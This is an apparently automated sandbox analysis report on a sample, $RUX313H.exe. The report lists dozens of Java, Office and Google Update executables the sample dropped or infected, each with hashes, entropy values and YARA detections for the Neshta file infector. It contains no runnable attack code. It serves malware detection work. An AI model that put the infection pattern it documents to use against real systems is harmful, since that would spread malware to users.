                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3GoO5OLmk1uFQfI5367Kd8:sr85Cnm5Wi3h8
                                                                        MD5:49108FC1C6FF24CD49C200E2D7A44B86
                                                                        SHA1:E79038C6363781BF92D4487BD77A4A770352E948
                                                                        SHA-256:06197B71B98A7C4FC08B2B354B6B5DE011BA11CF958827BEE3438B170A27F17F
                                                                        SHA-512:008A7A84B3BC2337AF59260348076CDEE1F3C507AD2BF4D2C567029E1F12594555D2BDC4B9BEB2AE77B29E07F7F02158806DB196BB1878D9018E34E7A7757FA1
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.653521772684421
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                                        MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                                        SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                                        SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                                        SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                                        Malicious:true
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.330325009255707
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKMmG2haDkdWIJ7OkUVS:sr85C/qzE+bgOkIS
                                                                        MD5:47848F50CD963815CF2894B7C284095C
                                                                        SHA1:8F8E03058352E172E9158782BC8E315D026CD720
                                                                        SHA-256:115C7F82BED3C1779F50CE53273248152587D8F9421B933C10534B84E16E7815
                                                                        SHA-512:9D692E732A6E0F673A2A4ACC6E7877976FCB2901A874D696ADF2A16EB55C08AB738744811AC9A6AFD5673F2FE272E2C6663B6EB123049F41FA5C1E68EBCD5A8E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.656070779362061
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                                        MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                                        SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                                        SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                                        SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                                        Malicious:true
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.6397427450636055
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                                        MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                                        SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                                        SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                                        SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                                        Malicious:true
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.346606571165856
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCOLIFaIz9SEhJyurf6S1TWfavAd3VbB:sr85Cb7hfFTkd33
                                                                        MD5:95ED8DD6C4D471F68911840679CA1F9B
                                                                        SHA1:5BDD0A4778F72B6AC95FEEFF108F74E342981690
                                                                        SHA-256:82B98FAF27483CB4C8957A2BC6306C47D59559046C8DCDC03C708C77C36E2417
                                                                        SHA-512:581BD049EDCEC4E330FEC670AF7B2980F1B338FC8588B596555803A43B0BE4232A3376CB314C8F3C9DC615D892D80746EB2E1C60766BDB7E046515DB9751DD8B
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.107296013528715
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWnoDdvhQBW1kqanjaYt6Zs8:sr85CaEQQhanIZs8
                                                                        MD5:4141A0DE0BCBE19FA9E93DB323462679
                                                                        SHA1:88F7E506A247D882C4F4E924D1E3DAB0FC077387
                                                                        SHA-256:3CD849C610540723B3785865DFCC8F65B820003251B39ED6594A8A979F20E948
                                                                        SHA-512:940ED87A4C20AE138D388D2324AEBCCA2FC4C93B8D8C2443E91EB382937F79B55BDAD03F595C4EF3FA94D0EC087EA3C228ABB143BBCB79C554E5C3FA38CAA754
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.242980084696127
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCZqO55PvVT4zHu+wLZ8qU:sr85CIO55PvV8HVwLZ8qU
                                                                        MD5:18E80CD6901FFDEDD81B44D0526240D4
                                                                        SHA1:640A66FC69235A0B3677A010376FC607CC2B50E6
                                                                        SHA-256:3A70FBA9C369E6FC2DB35AF45D1201833ADEB33B1ACE24603A582D2BACE6ACDF
                                                                        SHA-512:4F62E2168BFCFD0329F12F93FB5783B9D70989852CF9C12339FDED1ACC5C984FCC847555DD223C6EE2C3CEF64DD95F580DB31138F9D2F47E68FF2F6106A3BED3
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.2705620011183765
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFtwbWR/v1o/G42UR9whwRrcUTR9EhhBhc:sr85CpnD9UR9whwtvTRMBy
                                                                        MD5:F56F560D473A7660D3AD44E731930A06
                                                                        SHA1:B71090C328FF4234B213D76689591DE15DEBD0F3
                                                                        SHA-256:9B7384DC0D5DBA8C5161DB5C42D3075A4281716F741F10DEF974C5C680308CD0
                                                                        SHA-512:0134B6C093C053343177A83B81A23EEE54BF4C655958906B854B221B85097D633FA96953B83343F6C207BE5A15919017EA26C05DD3B46193618FC26510C6E74F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.110851138659397
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCIbgvgvwvEvFvwYF57LoW8dwhFz7Oos8iwiFT7XMvNvev0vUvZo:sr85CIbMMc4ZTTfRyKFifVlt7wx+oIVg
                                                                        MD5:4DA76295D7246E94AC917F192A2ACE84
                                                                        SHA1:58964579A019BEAB01488F1B1FD0A83C4A38B0CB
                                                                        SHA-256:D1D94327BEFFD6F453E862BFE9B715C980B20F33F38C8825AA2B2DF1DF33F9A5
                                                                        SHA-512:8811B0CC2BDE08B9354AC1F84F441F7E3D11A31D7E5D25139E53DA4C2C2E99645A1F37FAA7FD043B4FCC1169DB59FF4F7BA8EAC9CAC14CD455B3CCD34B6BAAD2
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.46960810763993
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCwMkBExFhpgLTGlrFBbeEOCr:sr85CJ7uTGlr3iE5r
                                                                        MD5:3AE73C8D42CF093E893717A04A20D5F8
                                                                        SHA1:96384CCD613D795E953BFD876250C86007EF74D6
                                                                        SHA-256:BAE7AFCEBAEF2A3BB243EFAF1305AED127D21B978D7C4335109F2A403A4C2CE1
                                                                        SHA-512:C90A74241A93652AB10BD6E1D476D89C995C7749938B83877C14A8F9496959C8868F21239DC6C468629852D154621E310CA76FB4C50DF8C02626560D48F96E07
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.448388258977007
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZyKcXJKtm61b0fth1uvh/NYANLOT9j/:JxqjQ+P04wsmJCRXJQm62t+vTaT9jxd7
                                                                        MD5:8BA32D4C4C59A22D2A5A1BEAB8B004C7
                                                                        SHA1:AA91417C5BA67F09E743A7740662EED65C4873EA
                                                                        SHA-256:2B0E0FBC461BED861EAF961F5058A18252A8A517008660D46063A1DCDF10DD02
                                                                        SHA-512:07B9A4827EFDE249FBD6953ABE3559A589500534E8DBAFF12C65EAD40FDE51395822BD265AE48D271ECB825BF6EDEC3D7CB7D2D96FFCBB3AA167FF7FC1A64AF4
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.285196024262785
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVJQEW8SSfaU/VEwdwzfnuktR9KJMkW:sr85CbQE2SkXFKJMt
                                                                        MD5:2355BC5DCE8E63203BD523F6A3EF11C9
                                                                        SHA1:06E09B957EC99F2635D39BD9D3EF6FB8C26FDD8F
                                                                        SHA-256:37D5B62049B2ECBAC53E3126E68E2FA0416A2E220C97E9951BD71FFF52E514A9
                                                                        SHA-512:71BCE642EDC4355E8CD217442EE6AEB1AA536069FAACA69633EF3B508A6E523FA2386A7EF841FC84F9EAF475725368DCC2CED0C0D4C13B170EE789A69FFDDCD7
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.72011826313205
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCa9IKr1BRo+SYZMuIb3eJG53B:sr85CaDr1BRo+SYZMuW32GhB
                                                                        MD5:BD61FF1B20A7530ECF797894EE1316DC
                                                                        SHA1:A9601D8B56C247B801E5D5A89377EEFA6FF37FA2
                                                                        SHA-256:29F10DE4B67C8BF585A581AE8893069FA52214A18CC4444D3E207A7A657EBD02
                                                                        SHA-512:CD91235FF8ACC7D8263EF05028E728E0BBA90D9459B3FD86568C7149DFF55F1E3E010C5234C234DA87B2CBFBE7B8C71DFEDD9E8C5BB326146579CA9EAD90055F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.169493808225336
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCslMDFepJnQxbMwwNOhO8WSnWR0Oj:sr85CsaeYyiL7WR0k
                                                                        MD5:8F4A79DC0DD71E8CA092D84C0260F92D
                                                                        SHA1:CEB13BACFAE68CFE94561487FC6E0AE0464C6A58
                                                                        SHA-256:2480D138EE436D182337435EF36F9A895ED9A98DA620C752976D575C08ECD390
                                                                        SHA-512:A100A527B654FE476672B7809A4C73F8C523C2620815476CF8D994E1553A344CFE4191FDF8641719D52B29743D625574A9287EF51BBF343B5D8FDD428FE68D33
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.3186383734960625
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCDnCgs1pSd8MvYMRLWjqov/M:sr85CD+4DFLWjlXM
                                                                        MD5:B4F5C898517A6B40402611BF65397423
                                                                        SHA1:F6E1F64CA7C05131682153B67E5EF5C54533F1DE
                                                                        SHA-256:E634A7EECA5A30B359DD622BA3A3BDBF5729173A416C86C962647B2B7A1F286C
                                                                        SHA-512:C510990B72E1FCD1007B38B0A9F4A28280E909D2AC81AE08F106EC482423927EE13081B89DA316D44EDC6FF684C3C3FB93E898705D6D7E7640612560C494E5CA
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.392056642854633
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjCTi/Y5cIzwdi9Jo5wJ8RNjRmBF2XFAkrfkGj:sr85CGT/5Lz8RNIBAXFdrtj
                                                                        MD5:77E4E96AC817B6D2DCC671C75B3AF7D5
                                                                        SHA1:2B3C254A156F9CD60BD9EF5B5832C7BC8F7FF9E2
                                                                        SHA-256:657B05CB38BED57B93383818722F9058FED9966D1CDA1AB5A00034CB0F6E9A0B
                                                                        SHA-512:F4F835B4004C5BF7C7ECB7DF6179EEF8DDDF277B13609A4ABE5AF4A748AD27A6207020E6A9E5301C89C0FF689CFCD99234245BB621CCC94A3E2A9B930DA63B0F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.496755886640026
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCJ5SSe4emv59S7OJvwgUQn73bPrI3SZ:sr85CJte4eK58i6gUQ7LL
                                                                        MD5:C5ECA751B54F507CCB797556E24D9EDA
                                                                        SHA1:30949D80A7FC4778ACCD14FA9A35B3910F0C96D2
                                                                        SHA-256:8F2BF3E7F90A0A85C2B121E448BF1C0BD8B5C8B860E64C1ABF64DBBA8C20111C
                                                                        SHA-512:AD1B5E374C615E92EFFD6E789BCFEB99D7DBECBCBB4DA4ABF013DE911E5BA8B6B14F836836EA8EC949F1652ABB29A32204FF5B9BF843C85ACC1453DCAB162C64
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.268163712816429
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdi4v7jFil6gu4ayPdTTFDiopJLN:sr85Cc4vHFs6gu4aCdPFDi2
                                                                        MD5:1EF797E5E199041B8A0EB41A50E73185
                                                                        SHA1:2D059C707E2738DD623FF8E4D336D8B90B482451
                                                                        SHA-256:0BB888F08C57AD222A544EB3A73478B4747059277A80F21A03E5655FA21CE119
                                                                        SHA-512:3B08845C01002AF7B35A5BCDCA1D984D7D019EE117F0CB761E3DA608329314067DA1A16ABEBC8AA3FCB602EC58EA77D0F1EE3FC288142DDD0F44970BF431BC77
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.201681837230837
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCpSsTITDBkt+ETGBaORneubkuJ:sr85C7IvibTCaOFeubks
                                                                        MD5:D528E65D0A3CFF610803965BAB5D42EE
                                                                        SHA1:A01448DD0C03BAF9B1E287BCB87A58450084BFFA
                                                                        SHA-256:C82DAD16438E79EE2ABC34D1B405F09DE3844FDEF99F9115B58E7D1F7C90C4E9
                                                                        SHA-512:4A0C3C8F49CE25A4D5D06359683DE444EDFC6B49E09323D10F675E5029D584135A80F89A04FE77CB58D4B9BC6522F7E2DC359FC8D6EB8A55F981AB4CC07B91F3
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.352529349012904
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCkb7zbeu8L16Ytx2XaRSX2qA4i:sr85Ckb7Heu8LSakmP
                                                                        MD5:2249CAFC0B359EA41F137AB87DC151FA
                                                                        SHA1:DABA42EFF4B9D3251E409CFD98A2BD3B9A672ED3
                                                                        SHA-256:3478297533C741CBF62D8FA8F2D820089E3777EBFD6DCDAD50F8FBCF93FB6304
                                                                        SHA-512:D0684A20BD7449D97323DBBE93467148F7E63DB79EC1BD3AC2E90D1350148EDF6F31E7BBEE1F32773D169CD04E1D11FEF03AE2E2C5637A89288FFB08C8115DB5
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.46773744909196
